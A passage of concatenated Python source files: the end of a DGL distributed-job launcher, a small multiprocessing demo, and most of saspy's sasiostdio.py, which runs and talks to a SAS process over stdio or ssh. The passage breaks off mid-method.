execute_remote(cmd, ip, thread_list)
for thread in thread_list:
thread.join()
def main():
parser = argparse.ArgumentParser(description='Launch a distributed job')
parser.add_argument('--workspace', type=str,
help='Path of user directory of distributed tasks. \
This is used to specify a destination location where \
the contents of current directory will be rsyncd')
parser.add_argument('--num_client', type=int,
help='Total number of client processes in the cluster')
parser.add_argument('--conf_path', type=str,
help='The path to the partition config file. This path can be \
a remote path like s3 and dgl will download this file automatically')
parser.add_argument('--ip_config', type=str,
help='The file for IP configuration for server processes')
args, udf_command = parser.parse_known_args()
assert len(udf_command) == 1, 'Please provide user command line.'
assert args.num_client > 0, '--num_client must be a positive number.'
udf_command = str(udf_command[0])
if 'python' not in udf_command:
raise RuntimeError("DGL launch can only support: python ...")
submit_jobs(args, udf_command)
def signal_handler(signal, frame):
logging.info('Stop launcher')
sys.exit(0)
if __name__ == '__main__':
fmt = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=fmt, level=logging.INFO)
signal.signal(signal.SIGINT, signal_handler)
main()
|
q11_multiprocessing.py | import multiprocessing
import time
# 子进程执行方法
def foo(n):
time.sleep(2)
print(n)
# 循环创建 10 个进程
for i in range(10):
print('i ===>', i)
# 创建子进程实例
p = multiprocessing.Process(target=foo, args=('person: %s' % i,))
# 运行子进程
p.start() |
sasiostdio.py | #
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
"""
This object is not intended to be used directly. Instantiate a SASsession object instead
"""
def __init__(self, session, **kwargs):
self._kernel = kwargs.get('kernel', None)
SAScfg = session._sb.sascfg.SAScfg
self.name = session._sb.sascfg.name
cfg = getattr(SAScfg, self.name)
self.saspath = cfg.get('saspath', '')
self.options = cfg.get('options', [])
self.ssh = cfg.get('ssh', '')
self.identity = cfg.get('identity', None)
self.luser = cfg.get('luser', None)
self.tunnel = cfg.get('tunnel', None)
self.rtunnel = cfg.get('rtunnel', None)
self.port = cfg.get('port', None)
self.host = cfg.get('host', '')
self.encoding = cfg.get('encoding', '')
self.metapw = cfg.get('metapw', '')
self.lrecl = cfg.get('lrecl', None)
self.iomc = cfg.get('iomc', '')
try:
self.outopts = getattr(SAScfg, "SAS_output_options")
self.output = self.outopts.get('output', 'html5')
except:
self.output = 'html5'
if self.output.lower() not in ['html', 'html5']:
print("Invalid value specified for SAS_output_options. Using the default of HTML5")
self.output = 'html5'
# GET Config options
try:
self.cfgopts = getattr(SAScfg, "SAS_config_options")
except:
self.cfgopts = {}
lock = self.cfgopts.get('lock_down', True)
# in lock down mode, don't allow runtime overrides of option values from the config file.
self.verbose = self.cfgopts.get('verbose', True)
self.verbose = kwargs.get('verbose', self.verbose)
insaspath = kwargs.get('saspath', '')
if len(insaspath) > 0:
if lock and len(self.saspath):
print("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
else:
self.saspath = insaspath
inoptions = kwargs.get('options', '')
if len(inoptions) > 0:
if lock and len(self.options):
print("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
else:
self.options = inoptions
inssh = kwargs.get('ssh', '')
if len(inssh) > 0:
if lock and len(self.ssh):
print("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
else:
self.ssh = inssh
inident = kwargs.get('identity', None)
if inident is not None:
if lock:
print("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
else:
self.identity = inident
inluser = kwargs.get('luser', None)
if inluser is not None:
if lock:
print("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
else:
self.luser = inluser
intunnel = kwargs.get('tunnel', None)
if intunnel is not None:
if lock:
print("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.tunnel = intunnel
inrtunnel = kwargs.get('rtunnel', None)
if inrtunnel is not None:
if lock:
print("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.rtunnel = inrtunnel
inport = kwargs.get('port', None)
if inport is not None:
if lock:
print("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
else:
self.port = inport
inhost = kwargs.get('host', '')
if len(inhost) > 0:
if lock and len(self.host):
print("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
else:
self.host = inhost
inencoding = kwargs.get('encoding', 'NoOverride')
if inencoding !='NoOverride':
if lock and len(self.encoding):
print("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
else:
self.encoding = inencoding
if not self.encoding:
self.encoding = '' # 'utf-8'
if self.encoding != '':
try:
coinfo = codecs.lookup(self.encoding)
except LookupError:
print("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
print("The correct encoding will attempt to be determined based upon the SAS session encoding.")
self.encoding = ''
inlrecl = kwargs.get('lrecl', None)
if inlrecl:
if lock and self.lrecl:
print("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
else:
self.lrecl = inlrecl
if not self.lrecl:
self.lrecl = 1048576
self._prompt = session._sb.sascfg._prompt
self.hostip = socks.gethostname()
try:
x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
z = x.stdout.read()
ip = z.rpartition(b'Address:')[2].strip().decode()
try:
socks.gethostbyaddr(ip)
self.hostip = ip
except:
pass
x.terminate()
except:
pass
return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
encoding - This is the python encoding value that matches the SAS session encoding of the IOM server you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
"""
#def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
def __init__(self, **kwargs):
self.pid = None
self.stdin = None
self.stderr = None
self.stdout = None
self._sb = kwargs.get('sb', None)
self._log_cnt = 0
self._log = ""
self.sascfg = SASconfigSTDIO(self, **kwargs)
self._startsas()
return
def __del__(self):
if self.pid:
self._endsas()
self._sb.SASpid = None
def _logcnt(self, next=True):
if next == True:
self._log_cnt += 1
return '%08d' % self._log_cnt
def _buildcommand(self, sascfg):
if sascfg.ssh:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t"]
if sascfg.identity:
parms += ["-i", sascfg.identity]
if sascfg.port:
parms += ["-p", str(sascfg.port)]
if sascfg.tunnel:
parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
if sascfg.rtunnel:
parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
if sascfg.luser:
parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
else:
parms += [sascfg.host, sascfg.saspath]
if sascfg.output.lower() == 'html':
print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
sascfg.output = 'html5'
else:
pgm = sascfg.saspath
parms = [pgm]
# temporary hack for testing grid w/ sasgsub and iomc ...
if sascfg.iomc:
pgm = sascfg.iomc
parms = [pgm]
parms += ["user", "sas", "pw", "sas"]
parms += ['']
elif sascfg.metapw:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
parms += sascfg.options
#parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
parms += ['']
else:
parms += sascfg.options
parms += ["-nodms"]
parms += ["-stdio"]
parms += ["-terminal"]
parms += ["-nosyntaxcheck"]
parms += ["-pagesize", "MAX"]
parms += ['']
return [pgm, parms]
def _startsas(self):
if self.pid:
return self.pid
pgm, parms = self._buildcommand(self.sascfg)
s = ''
for i in range(len(parms)):
s += parms[i]+' '
if os.name == 'nt':
try:
self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid = self.pid.pid
except OSError as e:
print("The OS Error was:\n"+e.strerror+'\n')
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
return None
else:
PIPE_READ = 0
PIPE_WRITE = 1
pin = os.pipe()
pout = os.pipe()
perr = os.pipe()
try:
pidpty = os.forkpty()
except:
import pty
pidpty = pty.fork()
if pidpty[0]:
# we are the parent
pid = pidpty[0]
os.close(pin[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_WRITE])
else:
# we are the child
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.close(0)
os.close(1)
os.close(2)
os.dup2(pin[PIPE_READ], 0)
os.dup2(pout[PIPE_WRITE], 1)
os.dup2(perr[PIPE_WRITE], 2)
os.close(pin[PIPE_READ])
os.close(pin[PIPE_WRITE])
os.close(pout[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_READ])
os.close(perr[PIPE_WRITE])
try:
#sleep(5)
os.execv(pgm, parms)
except OSError as e:
print("The OS Error was:\n"+e.strerror+'\n')
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
os._exit(-6)
except:
print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
os._exit(-6)
if os.name == 'nt':
try:
self.pid.wait(1)
error = self.pid.stderr.read(4096).decode()+'\n'
error += self.pid.stdout.read(4096).decode()
print("Java Error:\n"+error)
print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
self.pid = None
return None
except:
# lame windows can't do non-blocking I/O
self.stdout = Queue()
self.stderr = Queue()
self.to = Thread(target=self._read_out, args=())
self.te = Thread(target=self._read_err, args=())
self.to.daemon = True
self.te.daemon = True
self.to.start()
self.te.start()
self.stdin = self.pid.stdin
else:
self.pid = pidpty[0]
self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
lst = self.stdout.read1(4096)
print("stdout from subprocess is:\n"+lst.decode())
if self.pid is None:
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
return None
else:
enc = self.sascfg.encoding #validating encoding is done next, so handle it not being set for this one call
if enc == '':
self.sascfg.encoding = 'utf-8'
ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
self.sascfg.encoding = enc
if self.pid is None:
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
return None
if self.sascfg.verbose:
pid = self.pid if os.name != 'nt' else self.pid.pid
print("SAS Connection established. Subprocess id is "+str(pid)+"\n")
return self.pid
if os.name == 'nt':
def _read_out(self):
while True:
lst = self.pid.stdout.read(4096)
if lst == b'':
break
self.stdout.put(lst)
def _read_err(self):
while True:
log = self.pid.stderr.read(4096)
if log == b'':
break
self.stderr.put(log)
def _endsas(self):
rc = 0
ret = None
if self.pid:
code = b";*\';*\";*/;\n;quit;endsas;\n"
self._getlog(wait=1)
if self.pid:
out = self.stdin.write(code)
self.stdin.flush()
#self._asubmit(code,'text')
sleep(1)
if self.pid:
if os.name == 'nt':
pid = self.pid.pid
try:
rc = self.pid.wait(5)
except (subprocess.TimeoutExpired):
if self.sascfg.verbose:
print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
self.pid.kill()
self.to.join(5)
self.te.join(5)
else:
pid = self.pid
x = 5
while True:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
break
x = x - 1
if x < 1:
break
sleep(1)
if rc[0] != 0:
pass
else:
if self.sascfg.verbose:
print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
os.kill(self.pid, signal.SIGKILL)
if self.sascfg.verbose:
print("SAS Connection terminated. Subprocess id was "+str(pid))
self.pid = None
self._sb.SASpid = None
return ret
def _getlog(self, wait=5, jobid=None):
logf = b''
quit = wait * 2
logn = self._logcnt(False)
code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
while True:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
else:
quit -= 1
if quit < 0 or len(logf) > 0:
break
sleep(0.5)
x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
self._log += x
if x.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return x
def _getlst(self, wait=5, jobid=None):
lstf = b''
quit = wait * 2
eof = 0
bof = False
lenf = 0
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
bof = True
else:
lenf = len(lstf)
if (lenf > 15):
eof = lstf.count(b"</html>", (lenf - 15), lenf)
if (eof > 0):
break
if not bof:
quit -= 1
if quit < 0:
break
sleep(0.5)
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
if eof:
return lstf.decode(errors='replace')
else:
return lstf.decode(self.sascfg.encoding, errors='replace')
def _getlsttxt(self, wait=5, jobid=None):
f2 = [None]
lstf = b''
quit = wait * 2
eof = 0
self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
lenf = len(lstf)
eof = lstf.find(b"Tom was here", lenf - 25, lenf)
if (eof != -1):
final = lstf.partition(b"Tom was here")
f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
break
lst = f2[0]
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return lst.replace(chr(12), '\n')
def _asubmit(self, code, results="html"):
# as this is an _ method, it's not really to be used. Of note is that if this is used and if what it submitted generates
# anything to the lst, then unless _getlst[txt] is called, then next submit will happen to get the lst this wrote, plus
# what it generates. If the two are not of the same type (html, text) it could be problematic, beyond not being what was
# expected in the first place. __flushlst__() used to be used, but was never needed. Adding this note and removing the
# unnecessary read in submit as this can't happen in the current code.
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
if results.upper() != "HTML":
ods = False
if (ods):
self.stdin.write(odsopen)
out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
if (ods):
self.stdin.write(odsclose)
self.stdin.flush()
return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
'''
This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
code - the SAS statements you want to execute
results - format of results, HTML is default, TEXT is the alternative
prompt - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
the macros, or show what you type and keep the macros (they will still be available later)
for example (what you type for pw will not be displayed, user and dsname will):
results = sas.submit(
"""
libname tera teradata server=teracop1 user=&user pw=&pw;
proc print data=tera.&dsname (obs=10); run;
""" ,
prompt = {'user': False, 'pw': True, 'dsname': False}
)
Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
i.e,: results = sas.submit("data a; x=1; run; proc print;run')
print(results['LOG'])
HTML(results['LST'])
'''
prompt = prompt if prompt is not None else {}
printto = kwargs.pop('undo', False)
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
mj = b";*\';*\";*/;"
lstf = b''
logf = b''
bail = False
eof = 5
bc = False
done = False
logn = self._logcnt()
#logcodei = "%put E3969440A681A24088859985" + logn + ";"
#logcodeo = b"\nE3969440A681A24088859985" + logn.encode()
logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
logcodeo = b"E3969440A681A24088859985" + logn.encode()
pcodei = ''
pcodeiv = ''
pcodeo = ''
undo = b'proc printto;run;\n' if printto else b''
if self.pid == None:
self._sb.SASpid = None
print("No SAS process attached. SAS process has terminated unexpectedly.")
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')
# to cover the possibility of an _asubmit w/ lst output not read; no known cases now; used to be __flushlst__()
# removing this and adding comment in _asubmit to use _getlst[txt] so this will never be necessary; delete later
#while(len(self.stdout.read1(4096)) > 0):
# continue
if results.upper() != "HTML":
ods = False
if len(prompt):
pcodei += 'options nosource nonotes;\n'
pcodeo += 'options nosource nonotes;\n'
for key in prompt:
gotit = False
while not gotit:
var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
if var is None:
raise RuntimeError("No value for prompted macro variable provided.")
if len(var) > 0:
gotit = True
else:
print("Sorry, didn't get a value for that variable.")
if prompt[key]:
pcodei += '%let '+key+'='+var+';\n'
pcodeo += '%symdel '+key+';\n'
else:
pcodeiv += '%let '+key+'='+var+';\n'
pcodei += 'options source notes;\n'
pcodeo += 'options source notes;\n'
if ods:
self.stdin.write(odsopen)
pgm = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
out = self.stdin.write(pgm)
if ods:
self.stdin.write(odsclose)
out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bof = False
while not done:
try:
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
log = b''
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')
if bail:
eof -= 1
if eof < 0:
break
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
bof = True
else:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
if not bail and bc:
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bc = False
if not bail and logf.count(logcodeo) >= 1:
if ods:
lenf = len(lstf)
if lenf > 20 and bof:
if lstf.count(b"</html>", (lenf - 15), lenf):
bail = True
else:
bail = True
done = True
except (ConnectionResetError):
log = ''
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
rc = 0
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
else:
rc = os.waitpid(self.pid, 0)
self.pid = None
self._sb.SASpid = None
log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
return dict(LOG=log.encode(), LST='')
except (KeyboardInterrupt, SystemExit):
if not self._sb.sascfg.prompt:
raise KeyboardInterrupt("Interupt handling is disabled due to prompting being disabled.")
print('Exception caught!')
ll = self._breakprompt(logcodeo)
if ll.get('ABORT', False):
return ll
logf += ll['LOG']
lstf += ll['LST']
bc = ll['BC']
if not bc:
print('Exception handled :)\n')
else:
print('Exception ignored, continuing to process...\n')
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
if ods:
try:
lstf = lstf.decode()
except UnicodeDecodeError:
try:
lstf = lstf.decode(self.sascfg.encoding)
except UnicodeDecodeError:
lstf = lstf.decode(errors='replace')
else:
lstf = lstf.decode(self.sascfg.encoding, errors='replace')
logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))
trip = lstf.rpartition("/*]]>*/")
if len(trip[1]) > 0 and len(trip[2]) < 200:
lstf = ''
self._log += logf
final = logf.partition(logcodei)
z = final[0].rpartition(chr(10))
prev = '%08d' % (self._log_cnt - 1)
zz = z[0].rpartition("E3969440A681A24088859985" + prev)
logd = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))
lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
'<body class="l body">').replace("font-size: x-small;",
"font-size: normal;")
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
self._sb._lastlog = logd
return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
def _break(self, inlst=''):
found = False
lst = inlst
interupt = signal.SIGINT
os.kill(self.pid, interupt)
sleep(.25)
self._asubmit('','text')
while True:
if len(lst) > 0:
lsts = lst.rpartition('Select:')
if lsts[0] != '' and lsts[1] != '':
found = True
print('Processing interupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition('Cancel Submitted Statements')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Halt DATA')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Cancel the dialog')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
print("Unknown 'Select' choices found: ")
response = ''
print("'Select' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
lsts = lst.rpartition('Press')
if lsts[0] != '' and lsts[1] != '':
print('Seconday Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition(' to exit ')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('N to continue')
if opt[0] != '' and opt[1] != '':
response = 'Y'
else:
response = 'X'
print("'Press' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
#print("******************No 'Select' or 'Press' found in lst=")
pass
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
else:
log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
self._log += log
logn = self._logcnt(False)
if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
print("******************Found end of step. No interupt processed")
found = True
if found:
